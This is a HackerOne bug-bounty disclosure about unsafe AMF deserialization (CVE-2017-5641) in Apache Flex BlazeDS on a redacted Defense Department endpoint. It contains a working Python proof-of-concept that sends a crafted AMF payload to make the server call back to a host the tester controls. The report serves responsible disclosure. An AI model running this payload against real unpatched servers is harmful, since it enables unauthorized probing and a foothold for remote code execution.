U.S. Dept Of Defense: [HTAF4-213] [Pre-submission] Unsafe AMF deserialization (CVE-2017-5641) in Apache Flex BlazeDS at the https://www.███████/daip/messagebroker/amf

2019-11-0404:12:19

sp1d3rs

hackerone.com

$1666.65

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.1 High

AI Score

Confidence

High

JSON

##Description
We identified potential unsafe deserialization vulnerability on the https://www.█████/daip/messagebroker/amf endpoint.

##POC
To exclude false-positive reaction and show that pingback is result of AMF deserialization, and not a reaction to the external host in the POST body, first run this request:

POST /daip/messagebroker/amf HTTP/1.1
Host: www.███████
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.22.0
Content-Type: application/x-amf
Content-Length: 51

&lt;your collaborator host&gt;

Nothing will happen. You will receive something like this:
███
You can wait few minutes to ensure that nothing is coming.

Next, send the collaborator host inside the serialized AMF payload using this script, e.g. script.py <collaborator> 80

import struct
import sys
import requests
 
if len(sys.argv) != 3:
    print "Usage: host port"
    quit()
 

callback_IP = sys.argv[1]
callback_port = sys.argv[2]
 
amf_payload = '\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a' + \
              '\x07\x33' + 'sun.rmi.server.UnicastRef' + struct.pack('&gt;H', len(callback_IP)) + callback_IP + \
              struct.pack('&gt;I', int(callback_port)) + \
              '\xf9\x6a\x76\x7b\x7c\xde\x68\x4f\x76\xd8\xaa\x3d\x00\x00\x01\x5b\xb0\x4c\x1d\x81\x80\x01\x00';
 
url = "https://www.███████/daip/messagebroker/amf"
headers = {'Content-Type': 'application/x-amf'}
response = requests.post(url, headers=headers, data=amf_payload, verify=False)

This will result in the significant delay, and soon you will get the pingback from the ███/███ IP
This indicates, that backend server deserialized AMF data and triggered a DNS lookup (there won’t be http since sun.rmi.server.UnicastRef doesn’t communicate via http).

##Suggested fix
Update Apache Flex BlazeDS library